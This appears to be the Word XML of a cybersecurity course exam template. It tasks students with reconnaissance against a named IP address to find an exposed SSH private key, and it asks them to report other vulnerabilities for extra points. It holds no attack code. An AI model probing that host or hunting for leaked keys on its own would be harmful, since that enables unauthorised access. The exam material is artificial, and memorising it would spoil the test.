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footer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00" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="__DdeLink__536_2442165804"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Reconnaissance Fundamentals – Regular Exam</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Execution Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">You are hired to perform a digital investigation for the following target: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>185.218.124.165</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a template for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uploading your screenshots and data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The exam objective is to utilize active and passive reconnaissance to identify stored online ssh private key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Finding exposed public ssh key does not complete the exam objective.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>You are free to report vulnerabilities if you find any along the way. Each vulnerability gives extra points.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Not all vulnerabilities are giving the same number of points.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The order of the vulnerabilities </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DO NOT MATTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, nor the tools used to get to them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">You are free to upload multiple </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>screenshots</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, including your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and how did you </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>No network breach or local privilege escalation is needed!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Do not overstress or overcomplicate it. The time is enough, you can do it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
        </w:rPr>
        <w:t>Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Scope is open, meaning you can perform your own information gathering and you are free to enumerate the target for vulnerabilities from every angle.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Eop"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
        </w:rPr>
        <w:t>Appendix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Eop"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the data section. Make sure to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>detail each finding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. The overall vulnerability count is unknown, try to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>find as much as possible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> while following the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>main objective</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is a good practice to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>explain your finding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">When describing your finding, make sure to be as clear as possible by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>answering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>questions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Eop"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="1080" w:hanging="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>What is the vulnerability I found?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Eop"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="1080" w:hanging="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>How did I find it?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Eop"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Paragraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="1080" w:hanging="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normaltextrun"/>
          <w:rFonts w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri" w:asciiTheme="minorHAnsi" w:cstheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
